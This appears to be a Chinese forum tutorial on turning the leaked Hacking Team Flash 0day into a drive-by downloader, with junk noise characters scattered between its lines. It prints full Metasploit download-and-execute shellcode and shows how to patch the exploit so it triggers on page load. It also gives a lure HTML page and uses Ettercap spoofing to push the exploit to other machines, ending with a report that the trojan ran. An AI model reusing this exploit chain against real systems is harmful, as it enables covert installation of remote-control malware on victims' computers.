|
7 D% ]9 C* v( D0 d- { 三、flash 0day之手工代码修改制作下载者实例入侵演示
4 y: V3 z, m ]3 _" X0 g * M# ^/ z; c+ O G# c9 I: _* x# U
5 X- j& T1 c" ~
利用到的工具:
+ X' v5 U5 z. t! _) I- v: E g
% i4 t6 v( \4 p( J \4 s* n4 s! }9 c. l6 {9 J }
Msf
+ L" p6 m5 ~- c3 d: B2 ^9 c
- n; w8 V3 `% F
; T: e0 p! s: g& S. r* x8 h) A Ettercap
. l3 Y1 k3 L+ B. O r% ?& d$ ~ $ c3 S$ o1 p( ] L$ {
. a3 N4 L1 I) ~; J) `
Adobe Flash CS6 ( h2 ?5 ^6 B9 h* t1 T
8 u+ \2 \7 q/ t
0 U& o5 i* M$ i
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 . d: H" t$ U( H! r
% y& g' }/ ~5 N: _' f) }9 L
b7 I w4 `0 W+ h. T. j
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
+ ^% D& o5 c; V* \; m0 C, u & ~. H% k, A8 |8 c
$ v5 t9 N- V1 A( P1 |: G 如图: ! l8 O) t w3 j) h( ]
6 X* i8 [. ~4 U2 q, e& u
4 i+ u$ ?- L% x5 A
* h) c0 c' O' H5 T3 S O
+ D+ `6 q( c) u: j
0 r G( V8 n; ~& r! X/ \ n
3 |- O0 v' A$ O, p4 j! h
0 l1 Q3 D8 K, p1 ]3 F( s; t$ k$ R' z& O6 S9 X% |& {
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: * P) a6 D" p- G8 o8 w& S% U
: D7 f1 W7 E7 j
7 \2 E* l/ T: J; v4 r
- x4 |7 f# M* P2 h0 b
6 v, K$ v$ o+ T" z2 y, E
! e6 M' {. D- r V. W l
1 z: m; s" e$ w/ f3 k4 P/ S* |+ H3 R
$ {% j" Q( G7 f
" |3 c- r# n0 u' u+ } 然后执行generate -t dword生成shellcode,如下:
: r/ e+ N4 c' W5 r " n: w4 v+ M3 \! m5 _+ W. Y
' J, B f) h1 l+ H6 O! P
0 ~2 `+ R, H1 H7 w# R
5 ?7 s' R* U! M W; n) B' c' Y% U
复制代码到文本下便于我们一会编辑flash exp,如下: : }$ V7 Y# ?9 d3 @1 Q
" Z( f" c8 N4 V/ [% c+ f& f( Q# Q8 O0 S
: l7 j) `0 h: U1 V$ R& } 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
, f! u( m) p3 n1 t# @ ; y; I$ B+ w5 r* g$ e* C& Y
, ^% A1 W+ C% C2 ^) S! w2 F! u/ N
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
$ R0 @- n V6 o* _; Y2 z 2 S2 X$ W: x6 C# @' q
- G1 t; j- d* T6 m- D1 c6 a9 J
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
: `5 P+ [6 L1 J& B ! t6 o, o' m1 V2 P0 a
- Y: A0 S2 V" D9 m7 X- c
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
) O* v7 M! }" Z. k L " G' [: Q7 b R# Q' P/ S6 P& @
' g b( M4 K v& d/ @
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
0 q- G5 K! [2 G2 _, Y9 l" u
1 `6 m4 X0 x; }6 }* |+ X. c6 F3 w n$ M7 V
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 0 ]4 H$ d% c1 o3 K8 s h
. k7 o4 p) t# E: o
5 _" N$ I0 ?2 G" I3 v0 J 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, ! A! |+ d, D( Y4 C
' C E/ V. {- l$ z+ C7 O. Q
0 P1 H' c2 t1 k- }
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
! u" d) F2 ?: ~1 \3 } 3 G% o& B) c% c3 I& i
# u; M2 ~- j, `8 Z1 y 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, # i. R. A* A i$ R- k2 ^
N6 Y9 D# f1 ?" @. c$ C) M% h; f) H5 I4 v: @" |
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
( p1 y h3 } T8 Y+ e. A+ r3 v + }* k' W& S6 N/ c
; @4 D- [5 k: N* \$ E9 M0 j! }" ` 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, # P4 Q; b* k9 W( Z0 ^
9 O; C# B) i- @ [
) {& t% y2 {: d4 m+ S1 K' q/ t6 y. a 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
- c/ e" o- i; f+ b: z a- z& V) N& w7 `' G, ^0 V& D
* J4 u+ p) p1 Y% l 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
2 k8 u9 Z5 v1 j% D
+ k3 L y y8 }- S: y( w% O$ l) I [% B' o) e; W
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 2 _# r5 W5 x; f; _
9 D# |/ J5 t4 I8 S. ~
3 L* m8 ?& ]; o; o! U7 f( T8 g$ G
5 @+ ~1 d/ n2 y6 W, ?8 s
/ ^+ r" {5 K+ D" M5 A7 W
8 M- }7 O! a( H* d ' N5 l' J/ [8 D0 ?. f6 O
8 q. C! @3 h+ I+ ]6 s
+ X) {# Z% ] ^% o. r- P
下面我们来修改flash 0day exp,需要修改三个文件,分别为: 4 P/ A) v, r8 v5 O! d3 K' g
! Z. L1 a7 ?6 s F# d; F; ]
3 o3 f# g* z3 o+ b, ]( @7 t
1 \! q- t1 t% K- V/ Q6 D R2 c
9 _6 H5 @' E& Q! @. N
6 `1 R; a, |3 o; Q7 C) y 先修改ShellWin32.as,部分源代码如图:
# `' N, \, K0 I/ u7 Y 2 l D' u! R& Y( J
4 ~& ~5 D9 ]7 \" ?% s$ q2 H9 r9 _ 0 d) l6 t3 m0 L2 C# D* ]5 g
' Y% E! _& x5 @( c! {7 F
) _; C% U% K. ]- h, U 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: ; v7 d% M+ G2 Z b( z, C) a
( g1 `4 b x3 f! E" L+ M5 u( J# O) K9 x6 @* c& f
# ]* ]: |" t0 {- r2 s' ^ - H4 N& I5 H5 w
: {" Q t" b" W- A
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
9 b/ v' y3 O. z, T
& x9 F& G) c: j8 S f! z7 _. ~8 R: V1 s' f6 ?0 c* x( A( F2 X
) h! z. v0 x7 \# K! H 8 Q9 x7 w. o2 P2 f' j( M/ `8 Y% ?. A
% Z8 d; t7 u! g- ?' \8 c% S 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
: T% N% N5 t+ l1 K' C# ~7 V . I3 h# D1 i: F) z* [" v1 k
5 N. @6 k P* p+ T5 g
' N! I3 }! W6 h: l N & G# d8 H: ]; `, y% |& \
6 j+ A# Y5 I6 l& T$ }% X5 ^ . `2 p) c. l# M5 k
$ l6 b% p P7 m% O3 ~2 x, h6 h
2 W) y5 c% k/ r( O
6 x( ?0 C0 I6 y8 j# B! b
3 I9 T) y4 o2 x d$ A# |7 x3 v% m, H' [# x- \; ^$ `7 l! b! e
然后点保存,下面我们来编译一下,打开 8 b/ U0 l* X" l3 n" }% H& b1 Z
- S& J, Q, w0 ]7 j! l% i$ E/ ~6 X
& R8 O/ Y& K* `7 X* W exp1.fla然后点文件-发布,看看编译没错误
8 J% o/ l+ m$ ^8 S5 Y0 M
0 i! k! O' c T3 A; M- ~1 S0 x2 Y
8 s9 d. q7 b6 L' l1 I4 x' w! O
' P* v' J9 o: |% s$ r1 x
( |6 _) i2 E( N9 s+ S* y. n& v9 X
5 \4 Z6 V- k! a3 b- U, o
) Q9 q. l9 k# Y3 w0 g4 L2 k1 q 6 I. S1 ?# H/ Z: j4 ]
' S/ [, ]# k! V( \! m
9 W# t; N7 |- E1 K% S
+ q' d' y! T4 {, I! Q) \$ t; I5 E1 G" G3 A; m$ l
8 O4 I8 K; U1 c6 U' M
6 c8 v& q) |- |9 y: T$ P
: ?4 z, x \2 a0 m- @9 `
然后我们把生成的 ; Q( v8 C: o( V. K6 D- o
, v3 v. A" b% }! z9 e7 f8 B$ p; Z! L* q' n% w
exp1.swf丢到kailinux 的/var/www/html下: 7 G0 G0 I' W( [
! X: w! h4 d" e9 I0 d' S' D T+ m/ _( G4 R( u$ u' k3 A
然后把这段代码好好编辑一下
4 N* g' n1 {3 Y p6 r3 ~: M8 G5 [ }
- d- f! n* u6 Q% B& G6 ~7 c+ z
/ \, f1 Z: m: G2 T
* O- O% k6 x$ [0 I/ e4 H" c8 C# \' j2 X" x4 Y! h
i7 w) j" `7 _/ f+ o* I, i P
4 u9 K$ G6 E5 j- [7 P$ [
- C7 l4 B* I% n: y' C8 e7 W : h% f; f0 f! Z0 _+ ~0 t n
. ~3 B% F4 @6 }' |% @" R
+ V% @# {0 j. [) X _
' l/ E9 l u: d" z ; U! N8 y' x( J
; Y6 P0 U, ^. D( f! |9 ^! A( J) G
. }9 T$ ?% u% S3 G# U 9 p; R# _6 V& P$ k; a" j( b
2 A9 G+ b, ]0 n4 |. z 5 V" d8 y1 X, x
. c7 y% H( U5 m E r% s- @5 x- B2 d/ C% l! I h
<!DOCTYPE html> 5 o8 t6 [! J. e: n" V' N1 O, l; h
) C. C9 h& }% r* L' G7 q
! Y3 l. e4 ^+ g <html>
6 U5 P3 I$ K+ H
& y: e9 L# k& s( _, e# _# @0 s% i' c! H/ m7 F5 s$ g
<head>
0 c+ c3 s1 ]0 V* W6 k. R " |& p3 s/ {- y) m) t; E l
, \- j5 N& m) _% N) @
<meta http-equiv="Content-Type" content="text/html;
% f7 X# D& O1 _6 I2 ~ 6 Q+ g/ Y" h/ H, ~# o5 k4 x
) @7 Z8 a, R! F" Z9 Y+ x8 j; ~6 R! c
charset=utf-8"/>
( }. r% N! |' \! h/ O( ~ 2 p# e+ K' c; j: y8 V3 E* l9 V
3 ?8 h# i! }/ g
</head> 1 [: D: U8 [6 [
5 A+ C3 B, @1 O! X6 g# I1 D/ ?- f; G, |2 [
<body> , G9 z$ i, f. \3 d
* [# P2 r+ F f: p) K1 Y# @. W Y0 Q* [$ T) C$ x' M
<h2> Please wait, the requested page is loading...</h2> 0 v$ z/ i$ G6 k
4 ^5 S4 K$ N s" B: b/ u
; y' O7 t! I) H0 n
<br> * D, \1 b7 R# S7 A p# J2 c- K
: I; P. y% P6 v; k7 \' s
/ p8 A& E, f8 t$ s& X
<OBJECT
( D7 D8 T5 ~6 G: I& c. b ) h3 N, ?1 C- i+ }
: j2 |% h% }$ Z' g/ N1 N classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie 2 M: g3 a3 |! T; E) k
0 Z) ~8 ~; l- D% g2 B4 d* Q# y: h) o' g$ i/ J
VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
* x0 B! B a) Z% X6 |9 g- x6 @
' O( ~/ N2 m F" J( t' F0 w
2 L( r3 z5 K a# E: |- {, R: L </body>
6 O8 r; {) `9 [. @$ W- M! |, u% A' o
2 ~* `2 u5 t8 G; S x3 n/ D0 v& d9 [# I/ m
<script> ; K" I. d/ M3 `3 o) B6 K
, F; Q" z" o9 t+ T/ E/ F
]$ `" b# l$ Q setTimeout(function () { - c- o0 d8 u$ h0 O* o6 H
! s D4 N7 ]* K- T) n
6 ^4 k3 |# ?6 Q& ^1 Q$ x6 i: {, V# I 9 c; c4 B ~& M) B7 b
q: o! I. g+ y- F/ P" |
' C* g4 a$ p0 r7 k window.location.reload(); & O8 K2 h9 u/ E& V. E
. x* h: x* l$ N1 x, e( C; g, ^
5 D: C' V, b ~2 z. k, v3 Q
}, 10000); # r( I7 g1 ^+ k. h
8 g$ ~( K. z; j. C! W* I- J
' {4 U* Y, R# [* E ( B& V! O8 E3 w# L, G, M. k
1 F4 P j4 c$ b3 D: i
% Y) Y: N' Q2 _3 J </script> 5 m* u" U$ V5 I4 i3 ^
( n- W8 L X1 Z. P* @4 |" n8 `3 C
# F: a* j8 [- n9 G0 J; H </html> 2 A" m3 v! D- z( I
g8 d, [7 U! w4 e5 K9 W: @4 k' P* Y3 ]. y" l w8 `" a$ H
8 N5 J7 e. V2 h* y
+ @# P+ ]- r2 ?2 c$ R/ r* o6 X# w0 E8 g$ t
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
4 Q0 J( E+ u( J/ a: X7 c% Q3 u% e 7 M! c( X( t4 J1 } V1 o) \
3 E3 b. G4 B/ ^9 p1 p3 n+ _. p ( L- p. L" g; m. I
. s& _& Q3 J0 g7 ?; c8 v/ c. f' ]
5 D% O6 o. U8 I2 o2 n. g
7 Y- y! J; {/ F! c+ _; ^2 ^% n
+ }* n* [$ R0 c" ]$ ]& Q
* q, [4 Y3 m0 B$ h& a r
! f3 X7 e8 k% B( h: x0 r' h
- H3 m% Q7 w8 O- `6 D! P
$ j; _& r# k2 k
! \. S2 z! u! \% o- q; w, [: v
& g6 C$ ]% X7 q$ Y& s, M2 n
2 m3 A9 X1 z8 ~; l! H 0 k' a: b i; J0 i+ U( t2 Q- H
7 U8 U( y& g- c9 a
下面我们用ettercap欺骗如图:
# v4 a8 O- p, M5 _0 `! F1 F( m
* o) a7 _ b1 i9 h; h+ F- g1 J9 i3 c" P- L
# w! t. e+ q m( x/ f
" u. }& r* F8 h# k" A
( `" ^! [8 K3 h) n% Y0 j
$ G: o, j" p; A$ }- [ - G$ U4 y- E! k7 w2 c4 Z
4 ^( y( q. z4 @' Y N5 | 下面我们随便访问个网站看看:
1 W& y6 k/ s) O2 e6 `4 v
3 Q% H5 u9 ~- m0 R7 u9 v: f- ^7 [) k8 N- x# k
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
9 y7 ]: X1 B$ q1 {0 l 2 p& P( }. o; J$ c9 B
" N& p2 o' B" h2 M$ V
+ \8 ^$ u7 x% f( m
: I- @4 I, B. \$ s$ M6 s' i
* a9 Y6 t8 [ a2 V# ?. u5 U 我们看另一台, 0 u8 s, c# L9 B- H. b* m6 f1 v
& p! t; z3 l% d3 B" O0 A
) r1 T' F, u: c5 n. l 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 " b( f$ h* u; A9 g1 b* _* }
|